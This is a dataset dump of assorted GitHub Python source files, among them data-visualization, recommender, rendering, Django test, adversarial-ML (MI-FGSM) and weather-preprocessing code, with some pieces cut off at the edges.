pd.read_csv('情感数据.csv')\n plt.rcParams['font.sans-serif'] = ['SimHei']\n plt.rcParams['axes.unicode_minus'] = False\n sns.regplot(x='情感分值', y='评论数', data=df)\n plt.savefig('相关性.png')\n plt.show()\n\n\nif __name__ == '__main__':\n lda()\n sentiment()\n wordclound_zw()\n wordclound_bt()\n topic_pl()\n topic_qg()","repo_name":"13060923171/data-visualization3","sub_path":"数据挖掘实战-新闻文本分析/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9479,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"42"} +{"seq_id":"43060186815","text":"str = input(\"Greeting: \")\n# print(str)\narray = str.lstrip().lower().split(\" \")\n# print(array)\nif \"hello\" in array[0]:\n print(\"$0\")\nelif \"h\" in array[0][0]:\n print(\"$20\")\nelse:\n print(\"$100\")\n","repo_name":"XuandYu000/cs50x","sub_path":"bank/bank.py","file_name":"bank.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"3938709817","text":"# Function to \n# reverse a string \ndef reverseStr(str): \n n = len(str) \n \n # initialising a empty \n # string 'str1' \n str1 = ''\n i = n-1\n while i >=0:\n str1 += str[i]\n i -= 1\n print(str1) \n \n# Driver Code \ndef main(): \n str = \"geeksforgeeks\"; \n reverseStr(str); \n \nif __name__==\"__main__\": \n main() \n \n","repo_name":"Suhail727/GeneralProgramming","sub_path":"Reverse a String.py","file_name":"Reverse a String.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"35710315828","text":"#!/usr/bin/env python3\n\n# A quick and dirty way to draw a pixel grid out\n\nimport pygame\n \ndef main():\n width, height = 40, 6\n pix_size = 15\n off_x, off_y = 1, 1\n screen_size = (\n (width + 2) * pix_size,\n (height + 2 + 2) * pix_size,\n )\n bits = set()\n\n def dump_bits():\n print(\"-\" * 100)\n row = \"\"\n for x, y in sorted(bits):\n row += f\"({x},{y}),\"\n if len(row) >= 100:\n print(row)\n row = \"\"\n print(row)\n\n pygame.font.init()\n font = pygame.font.SysFont('Segoe UI', 10)\n buttons = [\n (1, height + 2, font.render(\"Dump 
grid\", False, (255, 255, 255)), dump_bits),\n ]\n\n pygame.init()\n pygame.display.set_caption(\"Bits and Bits\")\n\n screen = pygame.display.set_mode(screen_size)\n running = True\n\n set_to = None\n def toggle(x, y, force=None):\n if x >= pix_size and y >= pix_size and x < pix_size * (width + 1) and y < pix_size * (height + 1):\n x = (x // pix_size) - 1\n y = (y // pix_size) - 1\n if force is None:\n if (x, y) in bits:\n bits.remove((x, y))\n return False\n else:\n bits.add((x, y))\n return True\n else:\n if force:\n if (x, y) not in bits:\n bits.add((x, y))\n else:\n if (x, y) in bits:\n bits.remove((x, y))\n return force\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n running = False\n elif event.type == pygame.MOUSEBUTTONDOWN:\n set_to = toggle(event.pos[0], event.pos[1])\n if set_to is None:\n for x, y, _, func in buttons:\n if x * pix_size <= event.pos[0] <= (x + 10) * pix_size:\n if y * pix_size <= event.pos[1] <= (y + 1) * pix_size:\n func()\n elif event.type == pygame.MOUSEBUTTONUP:\n set_to = None\n elif event.type == pygame.MOUSEMOTION:\n if set_to is not None:\n toggle(event.pos[0], event.pos[1], set_to)\n\n pygame.draw.rect(screen, (0, 0, 0), (0, 0, screen_size[0], screen_size[1]))\n for x in range(width + 1):\n pygame.draw.line(screen, (128, 128, 128), ((x + off_x) * pix_size, off_y * pix_size), ((x + off_x) * pix_size, (height + off_y) * pix_size))\n for y in range(height + 1):\n pygame.draw.line(screen, (128, 128, 128), (off_x * pix_size, (y + off_y) * pix_size), ((width + off_x) * pix_size, (y + off_y) * pix_size))\n\n for x, y, text, _ in buttons:\n pygame.draw.rect(screen, (255, 255, 255), (x * pix_size, y * pix_size, (10) * pix_size, (1) * pix_size))\n pygame.draw.rect(screen, (92, 92, 92), (x * pix_size+1, y * pix_size+1, (10) * pix_size-2, (1) * pix_size-2))\n screen.blit(text, (x * pix_size+1, y * pix_size+1))\n\n for x, y in bits:\n pygame.draw.rect(screen, (255, 255, 255), ((x + off_x) * pix_size, (y + off_y) * pix_size, pix_size, pix_size))\n\n pygame.display.flip()\n\nif __name__==\"__main__\":\n main()\n","repo_name":"seligman/aoc","sub_path":"2023/Helpers/grid_draw.py","file_name":"grid_draw.py","file_ext":"py","file_size_in_byte":3481,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"42"} +{"seq_id":"5237342247","text":"import os\nimport environ\nfrom split_settings.tools import optional, include\nfrom coldfront.config.env import ENV, PROJECT_ROOT\n\n# ColdFront split settings\ncoldfront_configs = [\n 'base.py',\n 'database.py',\n 'auth.py',\n 'logging.py',\n 'core.py',\n 'plugins/cas_login.py',\n]\n\nif ENV.bool('EMAIL_ENABLED', default=False):\n coldfront_configs.append('email.py')\n\n# ColdFront plugin settings\nplugin_configs = {\n 'PLUGIN_SLURM': 'plugins/slurm.py',\n 'PLUGIN_IQUOTA': 'plugins/iquota.py',\n 'PLUGIN_FREEIPA': 'plugins/freeipa.py',\n 'PLUGIN_SYSMON': 'plugins/system_montior.py',\n 'PLUGIN_XDMOD': 'plugins/xdmod.py',\n 'PLUGIN_AUTH_OIDC': 'plugins/openid.py',\n 'PLUGIN_AUTH_LDAP': 'plugins/ldap.py',\n 'PLUGIN_LDAP_USER_SEARCH': 'plugins/ldap_user_search.py',\n 'PLUGIN_LDAP_USER_INFO': 'plugins/ldap_user_info.py',\n 'PLUGIN_CAS': 'plugins/cas_login.py',\n 'PLUGIN_ACADEMIC_ANALYTICS': 'plugins/academic_analytics.py',\n 'PLUGIN_ADVANCED_SEARCH': 'plugins/advanced_search.py',\n 'PLUGIN_MAINTENANCE_MODE': 'plugins/maintenance_mode.py',\n 
'PLUGIN_SLATE_PROJECT':'plugins/slate_project.py',\n}\n\n# This allows plugins to be enabled via environment variables. Can alternatively\n# add the relevant configs to local_settings.py\nfor key, pc in plugin_configs.items():\n if ENV.bool(key, default=False):\n coldfront_configs.append(pc)\n\n# Local settings overrides\nlocal_configs = [\n # Local settings relative to coldfront.config package\n 'local_settings.py',\n\n # System wide settings for production deployments\n '/etc/coldfront/local_settings.py',\n\n # Local settings relative to coldfront project root\n PROJECT_ROOT('local_settings.py')\n]\n\nif ENV.str('COLDFRONT_CONFIG', default='') != '':\n # Local settings from path specified via environment variable\n local_configs.append(environ.Path(ENV.str('COLDFRONT_CONFIG'))())\n\nfor lc in local_configs:\n coldfront_configs.append(optional(lc))\n\ninclude(*coldfront_configs)\n","repo_name":"IUResearchApplications/coldfront","sub_path":"coldfront/config/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"42"} +{"seq_id":"8817355650","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport numpy as np\r\nimport pandas as pd\r\nimport itertools\r\n\r\n\r\n\r\ndef proc_col(col, train_col=None):\r\n \"\"\"\r\n Encodes a pandas column with continuous IDs.\r\n\r\n \"\"\"\r\n if train_col is not None:\r\n uniq = train_col.unique()\r\n else:\r\n uniq = col.unique()\r\n \r\n # Create a dictionary that maps category names to numerical IDs\r\n name2idx = {o: i for i, o in enumerate(uniq)}\r\n \r\n # Replace each value in the column with its corresponding numerical ID,\r\n # using -1 if the value is not found in 'train_col'\r\n encoded_col = np.array([name2idx.get(x, -1) for x in col])\r\n \r\n # Calculate the number of unique categories in the column\r\n num_uniq = len(uniq)\r\n \r\n return name2idx, encoded_col, num_uniq\r\n\r\n\r\n\r\ndef encode_data(df, train=None):\r\n \"\"\"\r\n Encodes rating data with continuous user and item IDs.\r\n\r\n \"\"\"\r\n df = df.copy()\r\n for col_name in [\"userId\", \"itemId\"]:\r\n train_col = None\r\n if train is not None:\r\n train_col = train[col_name]\r\n _, col, _ = proc_col(df[col_name], train_col)\r\n \r\n # Remove rows with negative IDs (IDs not found in 'train' data)\r\n df = df[df[col_name] >= 0]\r\n \r\n # Update the DataFrame with the encoded column\r\n df[col_name] = col\r\n \r\n return df\r\n\r\n\r\ndef train_epocs(model, df_train, epochs=10, lr=0.01, wd=0.0, unsqueeze=False):\r\n \"\"\"\r\n Training loop for a recommendation model.\r\n\r\n This function trains the recommendation model for the specified number of epochs.\r\n It uses Mean Squared Error (MSE) loss and an Adam optimizer for training.\r\n \"\"\"\r\n optimizer = torch.optim.Adam(model.parameters(), lr=lr, weight_decay=wd)\r\n model.train()\r\n \r\n for i in range(epochs):\r\n # Load user IDs, item IDs, and ratings from the training data\r\n users = torch.LongTensor(df_train.userId.values - 1)\r\n items = torch.LongTensor(df_train.itemId.values - 1)\r\n ratings = torch.FloatTensor(df_train.rating.values)\r\n \r\n # Optionally, unsqueeze the ratings tensor to match the model output shape\r\n if unsqueeze:\r\n ratings = ratings.unsqueeze(1)\r\n \r\n # Forward pass: compute predicted ratings\r\n y_hat = model(users, items)\r\n \r\n # Calculate Mean Squared Error (MSE) loss between predictions and actual ratings\r\n loss = 
F.mse_loss(y_hat, ratings)\r\n \r\n # Backpropagation: compute gradients and update model weights\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n \r\n # Print the loss for the current epoch\r\n print(f\"Epoch {i+1}/{epochs}, Loss: {loss.item()}\")\r\n\r\n\r\n\r\n\r\n\r\nclass CollabFNet(nn.Module):\r\n def __init__(self, num_users, num_items, emb_size=2, n_hidden=3): # emb_size and n_hidden should be hyperparameters\r\n \"\"\"\r\n Collaborative Filtering Neural Network (CollabFNet) model for recommendation.\r\n\r\n Initializes the CollabFNet model with user and item embedding layers and neural network layers.\r\n \"\"\"\r\n super(CollabFNet, self).__init__()\r\n \r\n self.user_emb = nn.Embedding(num_users, emb_size)\r\n \r\n self.item_emb = nn.Embedding(num_items, emb_size)\r\n \r\n self.lin1 = nn.Linear(emb_size * 2, n_hidden)\r\n \r\n self.lin2 = nn.Linear(n_hidden, 1)\r\n \r\n self.drop1 = nn.Dropout(0.1)\r\n \r\n def forward(self, u, v):\r\n \"\"\"\r\n Forward pass of the CollabFNet model.\r\n\r\n Parameters:\r\n - u: torch.Tensor\r\n Tensor containing user IDs.\r\n - v: torch.Tensor\r\n Tensor containing item IDs.\r\n\r\n Returns:\r\n - torch.Tensor\r\n Predicted ratings or scores for user-item interactions.\r\n \"\"\"\r\n # Lookup user embeddings for the given user IDs\r\n U = self.user_emb(u)\r\n \r\n # Lookup item embeddings for the given item IDs\r\n V = self.item_emb(v)\r\n \r\n # Concatenate user and item embeddings\r\n x = F.relu(torch.cat([U, V], dim=1))\r\n \r\n # Apply dropout for regularization\r\n x = self.drop1(x)\r\n \r\n # Apply ReLU activation to the first linear layer\r\n x = F.relu(self.lin1(x))\r\n \r\n # Apply the second linear layer for final predictions\r\n x = self.lin2(x)\r\n \r\n return x\r\n\r\n\r\n\r\ndef create_candidate_set(ratings_df, num_users, num_items, item_name_mapping):\r\n\r\n # Create a set of all possible user-item pairs\r\n all_user_ids = range(1, num_users + 1) # 1- 100 # since ratings_df will consist of 1-100\r\n all_item_ids = range(1, num_items + 1)\r\n all_user_item_pairs = list(itertools.product(all_user_ids, all_item_ids))\r\n\r\n # Convert the rated user-item pairs to a set for faster lookup\r\n rated_user_item_pairs = set(zip(ratings_df['userId'], ratings_df['itemId']))\r\n\r\n # Identify unused user-item pairs as the complement of rated pairs\r\n unused_user_item_pairs = list(set(all_user_item_pairs) - rated_user_item_pairs)\r\n\r\n # Create a DataFrame for the candidate set\r\n candidate_set = pd.DataFrame(unused_user_item_pairs, columns=['userId', 'itemId'])\r\n candidate_set['item'] = candidate_set['itemId'].map(item_name_mapping)\r\n \r\n return candidate_set # candidate set will have 1-100 and 1-10 combinations\r\n\r\n\r\n\r\n\r\n# Function to predict ratings for the candidate set using the trained model\r\ndef predict_ratings_for_candidate_set(model, candidate_set, item_name_mapping):\r\n \"\"\"\r\n Predict ratings for user-item pairs in the candidate set.\r\n \"\"\"\r\n # Convert user and item IDs to PyTorch tensors\r\n user_ids = torch.LongTensor(candidate_set['userId'].values - 1) # for prediction, we subtract 1 \r\n item_ids = torch.LongTensor(candidate_set['itemId'].values - 1)\r\n \r\n # Use the model to predict ratings\r\n predicted_ratings = model(user_ids, item_ids)\r\n \r\n results_df = pd.DataFrame({\r\n 'userId': candidate_set['userId'], # but for df we can have 1-100\r\n 'itemId': candidate_set['itemId'], \r\n 'item': candidate_set['item'] ,\r\n 'predicted_ratings': 
predicted_ratings.squeeze().tolist()\r\n })\r\n \r\n return results_df\r\n\r\n\r\n# Function to recommend items for a specific user\r\ndef recommend_items_for_user(model, user_id, results_df, top_n=3):\r\n \"\"\"\r\n Recommend items for a specific user based on predicted ratings.\r\n\r\n \"\"\"\r\n # Filter candidate set for the specific user\r\n user_candidate_set = results_df[results_df['userId'] == user_id]\r\n \r\n # Sort the user's candidate set by predicted rating in descending order\r\n sorted_candidate_set = user_candidate_set.sort_values(by='predicted_ratings', ascending=False)\r\n \r\n # Select the top-N recommendations\r\n recommendations = sorted_candidate_set.head(top_n)\r\n \r\n return recommendations\r\n\r\n\r\n\r\n\r\n","repo_name":"himanshukumargupta11012/Milan_hackathon","sub_path":"backend/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":7020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"70385231167","text":"import mitsuba as mi\nimport drjit as dr\nimport matplotlib.pyplot as plt\n\nmi.set_variant(\"cuda_ad_rgb\")\nscene = mi.load_file(\"../scenes/shader_ball/scene.xml\", spp=512)\nparams = mi.traverse(scene)\n\nimg = mi.render(scene)\nimg = mi.util.convert_to_bitmap(img)\n\nplt.axis(\"off\")\nplt.imshow(img)\nplt.savefig(\"rough_dielectric_2.png\")","repo_name":"gmf128/mitsuba-quickstart","sub_path":"bsdfs/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"39926691890","text":"class Solution:\n def lengthOfLIS(self, nums: List[int]) -> int:\n #go through finding sequences and store in dictionary\n #if you start with a certain number you have to end in a certain sqeuence\n #because you go in order\n #store in dict and return\n #implmeent find seq first then dictionary \n \n res = 0\n \n tot = [1] * len(nums) # I had most of it down except this part, where this allows\n #you to iterate over the array without taking into account the ones that you\n #want to remove \n \n for i in range(1, len(nums)):\n for j in range(0, i):\n if nums[i] > nums[j]:\n tot[i] = max(tot[i], tot[j] + 1)\n \n return max(tot)\n\n\n\n'''\noptimal nlogn approach i found \n\nclass Solution:\n def lengthOfLIS(self, arr: List[int]) -> int:\n subs = [arr[0]]\n for i in range(1,len(arr)):\n if arr[i] > subs[-1]: subs.append(arr[i])\n else:\n subs[bisect_left(subs, arr[i], 0, len(subs))] = arr[i]\n return len(subs)\n\n'''","repo_name":"saesak/codinginterview","sub_path":"leetcode/Top 50 Interview Questions (Medium)/Dynamic Programming/300. Longest Increasing Subsequence (Medium).py","file_name":"300. 
Longest Increasing Subsequence (Medium).py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"24886533324","text":"import logging\nimport os\nfrom unittest.mock import patch, MagicMock\n\nfrom django.conf import settings\nfrom django.test import TestCase, RequestFactory, override_settings\nfrom django.urls import reverse\nfrom django.test import TestCase, override_settings\n#from biostar.accounts.models import Use\n\nfrom biostar.recipes import auth, const\nfrom biostar.recipes import models, views, api\nfrom biostar.utils.helpers import fake_request, get_uuid\n\nlogger = logging.getLogger('engine')\n\nTEST_ROOT = os.path.abspath(os.path.join(settings.BASE_DIR, 'export', 'tested'))\nTOC_ROOT = os.path.join(TEST_ROOT, 'toc')\n__CURRENT_DIR = os.path.abspath(os.path.dirname(__file__))\n\n# Ensure that the table of directory exists.\nos.makedirs(TOC_ROOT, exist_ok=True)\n\n@override_settings(MEDIA_ROOT=TEST_ROOT, TOC_ROOT=TOC_ROOT)\nclass RecipeRunTest(TestCase):\n\n def setUp(self):\n logger.setLevel(logging.WARNING)\n\n # Set up generic owner\n self.owner = models.User.objects.create_user(username=f\"tested{get_uuid(10)}\", email=\"tested@l.com\",\n is_staff=True, is_superuser=True)\n self.owner.set_password(\"tested\")\n self.factory = RequestFactory()\n\n self.project = auth.create_project(user=self.owner, name=\"tested\", text=\"Text\", summary=\"summary\",\n uid=\"tested\")\n # Test data\n self.recipe = auth.create_analysis(project=self.project, json_text=\"\", template=\"#test template\")\n self.recipe.save()\n\n def test_authorize_run(self):\n \"\"\"Test to see if function that authorizes runs works correctly.\"\"\"\n\n user1 = self.owner\n recipe = self.recipe\n\n # Current user can run the recipe\n\n self.assertTrue(auth.authorize_run(user1, recipe), \"Authorized users can not run recipes.\")\n\n user2 = models.User.objects.create_user(username=f\"tested{get_uuid(10)}\", email=\"tested@l.com\")\n\n self.assertFalse(auth.authorize_run(user2, recipe), \"Unauthorized users can run recipes.\")\n return\n\n\n@override_settings(MEDIA_ROOT=TEST_ROOT)\nclass RecipeViewTest(TestCase):\n\n def setUp(self):\n logger.setLevel(logging.WARNING)\n\n # Set up generic owner\n self.owner = models.User.objects.create_user(username=f\"tested{get_uuid(10)}\", email=\"tested@l.com\",\n is_staff=True, is_superuser=True)\n self.owner.set_password(\"tested\")\n self.factory = RequestFactory()\n\n self.project = auth.create_project(user=self.owner, name=\"tested\", text=\"Text\", summary=\"summary\",\n uid=\"tested\")\n # Test data\n self.recipe = auth.create_analysis(project=self.project, json_text=\"\", template=\"#test template\")\n self.recipe.save()\n\n @patch('biostar.recipes.models.Job.save', MagicMock(name=\"save\"))\n def test_recipe_run(self):\n \"Test the recipe run view with POST request\"\n\n data = {\"name\": \"name of the job\"}\n\n url = reverse('recipe_run', kwargs=dict(uid=self.recipe.uid))\n\n request = fake_request(url=url, data=data, user=self.owner)\n\n self.recipe.security = models.Analysis.AUTHORIZED\n self.recipe.save()\n\n response = views.recipe_run(request=request, uid=self.recipe.uid)\n\n self.process_response(response=response, data=data, save=True, model=models.Job)\n\n @patch('biostar.recipes.models.Analysis.save', MagicMock(name=\"save\"))\n def test_recipe_create(self):\n \"Test recipe create with POST request\"\n data = {\"name\": \"tested\", \"summary\": \"summary\", 
\"text\": \"text\", \"rank\": 100,\n \"uid\": \"tested\", 'json_text':'', 'template':'# Code here'}\n url = reverse('recipe_create', kwargs=dict(uid=self.project.uid))\n\n request = fake_request(url=url, data=data, user=self.owner)\n\n response = views.recipe_create(request=request, uid=self.project.uid)\n\n self.process_response(response=response, data=data, save=True)\n\n @patch('biostar.recipes.models.Analysis.save', MagicMock(name=\"save\"))\n def test_recipe_edit(self):\n \"Test recipe edit with POST request\"\n from biostar.recipes import ajax\n\n data = {\"name\": \"tested\", \"text\": \"text\", \"rank\": 100,\n \"uid\": \"tested\", 'json_text':'', 'template':'# Code here'}\n url = reverse('ajax_recipe_edit', kwargs=dict(id=f\"{self.recipe.id}\"))\n\n request = fake_request(url=url, data=data, user=self.owner)\n\n response = ajax.ajax_edit(request=request, id=self.recipe.id)\n\n #self.process_response(response=response, data=data, save=True)\n\n def test_recipe_code_download(self):\n \"Test recipe code download \"\n\n url = self.recipe.download_url()\n request = fake_request(url=url, data={}, user=self.owner)\n response = views.recipe_code_download(request=request, uid=self.recipe.uid, fname=\"recipe.sh\")\n\n self.assertTrue(response.content.decode() == self.recipe.template,\n f\"Error downloading code. Expected: {self.recipe.template} \"\n f\"received: {response.content.decode()}\")\n\n def test_recipe_delete(self):\n \"Test reset delete\"\n\n url = reverse('recipe_delete', kwargs=dict(uid=self.recipe.uid))\n\n request = fake_request(url=url, data={}, user=self.owner)\n\n response = views.recipe_delete(request=request, uid=self.recipe.uid)\n\n self.process_response(response=response, data={})\n\n def Xtest_api(self):\n \"Test the recipe api\"\n\n api_list = reverse('api_list'), api.recipe_api_list, {}\n api_json = reverse('recipe_api_json', kwargs=dict(uid=self.recipe.uid)), api.recipe_json, dict(\n uid=self.recipe.uid)\n api_template = reverse('recipe_api_template', kwargs=dict(uid=self.recipe.uid)), api.recipe_template, dict(\n uid=self.recipe.uid)\n\n for data in [api_list, api_json, api_template]:\n url, view_func, params = data\n\n request = fake_request(url=url, data={'k': settings.API_KEY}, user=self.owner)\n\n response = view_func(request=request, **params)\n\n self.assertEqual(response.status_code, 200, f\"Could not redirect :\\nresponse:{response}\")\n\n def test_recipe_update(self):\n \"Test updating recipe through auth\"\n\n changed = auth.create_analysis(project=self.project,\n json_text=self.recipe.json_text,\n template=self.recipe.template,\n uid=self.recipe.uid, update=True)\n\n self.assertEqual(changed.uid, self.recipe.uid)\n\n def process_response(self, response, data, model=models.Analysis, save=False):\n \"Check the response on POST request is redirected\"\n\n self.assertEqual(response.status_code, 302,\n f\"Could not redirect :\\nresponse:{response}\")\n\n if save:\n self.assertTrue(model.save.called, \"save() method not called when editing.\")\n","repo_name":"ialbert/biostar-central","sub_path":"biostar/recipes/test/test_recipe.py","file_name":"test_recipe.py","file_ext":"py","file_size_in_byte":7101,"program_lang":"python","lang":"en","doc_type":"code","stars":561,"dataset":"github-code","pt":"42"} +{"seq_id":"34984795936","text":"# 5.\tWrite a Python Program to Find Armstrong Number in an Interval?\nstart = int(input(\"Enter the start of the interval: \"))\nend = int(input(\"Enter the end of the interval: \"))\n\nfor num in range(start, end + 1):\n # 
Compute the sum of the cubes of the digits\n sum = 0\n temp = num\n while temp > 0:\n digit = temp % 10\n sum += digit ** 3\n temp //= 10\n\n # Check if the number is an Armstrong number\n if num == sum:\n print(num)\n","repo_name":"07Sada/Assingment","sub_path":"Python_Basic_Programming_Assignment/Programming_Assingment_4/p5.py","file_name":"p5.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"40828517045","text":"from attacks.attack import *\n\n\nclass MIFGSM(Attack):\n def __init__(self, model, mean, std, eps=8 / 255, steps=5, decay=1.0):\n super(MIFGSM, self).__init__(\"MIFGSM\", model, mean, std)\n self.eps = eps\n self.steps = steps\n self.decay = decay\n self.alpha = self.eps / self.steps\n\n def attack(self, images, labels):\n r\"\"\"\n Overridden.\n \"\"\"\n images = images.clone().detach().cuda()\n labels = labels.clone().detach().cuda()\n images = self._reverse_norm(images)\n\n loss = nn.CrossEntropyLoss()\n momentum = torch.zeros_like(images).detach().cuda()\n\n adv_images = images.clone().detach()\n\n for i in range(self.steps):\n adv_images.requires_grad = True\n outputs = self.model(adv_images)\n\n cost = - loss(outputs, labels)\n\n grad = torch.autograd.grad(cost, adv_images,\n retain_graph=False, create_graph=False)[0]\n\n grad_norm = torch.norm(nn.Flatten()(grad), p=1, dim=1)\n grad = grad / grad_norm.view([-1] + [1] * (len(grad.shape) - 1))\n grad = grad + momentum * self.decay\n momentum = grad\n\n adv_images = adv_images.detach() - self.alpha * grad.sign()\n delta = torch.clamp(adv_images - images, min=-self.eps, max=self.eps)\n adv_images = torch.clamp(images + delta, min=0, max=1).detach()\n\n adv_images = self._norm(adv_images)\n return adv_images\n","repo_name":"OrangeBai/pytorch-detection","sub_path":"attack/mifgsm.py","file_name":"mifgsm.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"7572203070","text":"__all__ = [\"matrix_to_file\", \"parse_file\"]\n\nimport re\n\nimport numpy as np\n\n\ndef matrix_to_file(distance_matrix, file):\n \"\"\"\n :param distance_matrix: a matrix with nodes as indexes and distances as values\n :param file: either a filename or an open file\n \"\"\"\n opened = False # keep track of whether we opened the file (the function input was a filename) or not\n\n try:\n if type(file) == str:\n file = open(file, 'w')\n opened = True\n\n file.seek(0)\n\n n = len(distance_matrix)\n file.write(\"VERTICES = {}\\n;\\n\\n\".format(n))\n\n file.write(\"DISTANCE_MATRIX = \\n\")\n for i in range(0, n):\n for j in range(0, n):\n file.write(\"{}\\t{}\\t{}\\n\".format(i, j, distance_matrix[i][j]))\n\n file.write(\";\")\n\n except OSError as err:\n print(\"Error in writing file: {0}\".format(err))\n finally:\n if opened:\n file.close()\n\n\ndef has_numbers(input_string):\n return any(char.isdigit() for char in input_string)\n\n\ndef parse_file(filename):\n num_vertices = None\n matrix = None\n with open(filename, 'r') as fp:\n first_line = fp.readline()\n num_vertices = re.findall(r'\\d+', first_line)\n assert len(num_vertices) == 1, 'Error in parsing file {}. 
First line should be VERTICES = ##\\n'.format(filename)\n num_vertices = int(num_vertices[0])\n\n line = fp.readline()\n while (\"DISTANCE_MATRIX\" not in line):\n line = fp.readline()\n\n \"\"\" from next line all lines are\n # # #\n -> three numbers, which are 'i, j, distance between i and j'\n \"\"\"\n matrix = np.zeros((num_vertices, num_vertices))\n line = fp.readline()\n while has_numbers(line):\n # read_i, read_j, read_distance\n ri, rj, rd = re.findall(r'^(\\d+)\\s*(\\d+)\\s*(\\d+(?:\\.\\d+)?)', line)[0]\n\n matrix[int(ri), int(rj)] = float(rd)\n line = fp.readline()\n\n return num_vertices, matrix\n","repo_name":"mirkosalaris/CoverageModularEnvironments","sub_path":"src/fileio.py","file_name":"fileio.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"41650134541","text":" #!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: Gray Martin, July 2020 updates by John McGuire\n\"\"\"\n\n#%% Imports\nimport logging\nimport utilities\nimport equations\nimport datetime\nimport numpy as np\nimport pandas as pd\nimport geopandas as gpd\nfrom netCDF4 import Dataset\n\n#%% Setup\n#%%% Logging\nlog = logging.getLogger(__name__)\nlog_format = \"%(levelname)-7.7s - %(message)-60s\\t - [%(lineno)d] %(module)s.%(funcName)s\"\nlogging.basicConfig(level=logging.INFO, format=log_format)\n\n#%%% Development\n#TESTMODE = True\nTESTMODE = False\nDEBUGMODE = False\nnp.warnings.filterwarnings('ignore')\n\n#%%% Constants\nZ = 6\nstatelist = [\"North Carolina\", \"Virginia\"]\n\n# Get the file list\nvdatenow = datetime.datetime.utcnow()\nvdatetime = datetime.datetime(vdatenow.year, vdatenow.month, vdatenow.day, Z)\n\nif(vdatetime <= vdatenow):\n vdate = vdatetime\nelse:\n vdatetime = vdatetime - datetime.timedelta(days=1)\n vdate = vdatetime\n #vdate = vdate - datetime.timedelta(days=1)\nvdate_ymd = vdate.strftime(\"%Y%m%d\")\nvdate_ymdh = vdate.strftime(\"%Y%m%d%H\")\n\n# Generate the files\nlog.info(\"Generate files for\"+vdate_ymdh)#files = utilities.build_input_data(vdate, Z)\nfiles = utilities.build_input_data(vdate, Z)\nlog.info(\"Done generate files\")#files = utilities.build_input_data(vdate, Z)\n\n# File input\nnx,ny,nt = utilities.import_dims(\"input/rtma.nc\")\nvtime_rtma,times_rtma = utilities.import_times(\"input/rtma.nc\")\nvtime_ndfd,times_ndfd = utilities.import_times(\"input/ndfd.nc\")\nvtime_nbm,times_nbm = utilities.import_times(\"input/nbm.nc\")\n\nlat_array,lon_array = utilities.import_latlon(\"input/rtma.nc\")\n\n# The Mixture Configuration is as follows:\n#\n# \"We use the data [NDFD] until it reaches the 6-hourly mark, \n# then transition to NBM data to keep data at hourly then 3-hourly intervals.\"\"\n#\n# According to this input data, it appears that it should be mixed as following\n# 1-46, NDFD\n# 47-64, NBM\nvtime_mix=vtime_ndfd\ntimes_mix=np.concatenate([times_ndfd[:46],times_nbm[46:]],axis=0)\n\nRTMA_dates,RTMA_dates_int,RTMA_hours,mix_dates,mix_dates_int,mix_hours = utilities.file_timing(Z)\n#print(RTMA_dates)\n#print(mix_dates)\n\nsource_rtma = [\"rtma\" for i in range(0,len(times_rtma))]\nsource_ndfd = [\"ndfd\" for i in range(0,len(times_ndfd))]\nsource_nbm = [\"nbm\" for i in range(0,len(times_nbm))]\nsource_mix = np.hstack([source_ndfd[:46],source_nbm[46:]]) \n\n# The final times should in theory be\n# 1-25: RTMA\n# 26-71: NDFD\n# 72-89: NBM\n#times = np.hstack((times_rtma, times_nbm))\n#times_source = np.hstack((source_rtma, source_nbm))\ntimes = 
np.hstack((times_rtma, times_mix))\ntimes_source = np.hstack((source_rtma, source_mix))\n#print(times)\n#print(times_source)\n\n#%%% Longitude and Latitude \n#log.info(\"Longitude and Latitude\")\n#with open(\"resources/lonlat.csv\") as read_file:\n# lonlat = pd.read_csv(read_file)\n##print(nx,ny,nt)\n##quit()\n#\n## Set up arrays for both longitude and latitude\n#lon = lonlat.lon.to_numpy()\n#lon_array = lon.reshape(1,ny,nx)\n#\n#lat = lonlat.lat.to_numpy()\n#lat_array = lat.reshape(1,ny,nx)\n\n# Create \"stacked\" arrays spanning across time scales\nlon_RTMA = np.repeat(lon_array, len(times_rtma), axis=0)\nlat_RTMA = np.repeat(lat_array, len(times_rtma), axis=0)\n\nlon_NDFD = np.repeat(lon_array, len(times_ndfd), axis=0)\nlat_NDFD = np.repeat(lat_array, len(times_ndfd), axis=0)\n\nlon_mix = np.repeat(lon_array, len(times_mix), axis=0)\nlat_mix = np.repeat(lat_array, len(times_mix), axis=0)\n\n## Create GeoPandas DataFrame containing latitude and longitude\n#gdf = gpd.GeoDataFrame(lonlat, \n# geometry=gpd.points_from_xy(lonlat.lon-360, lonlat.lat))\n#\n##%%% Region Masking\n#log.info(\"Region 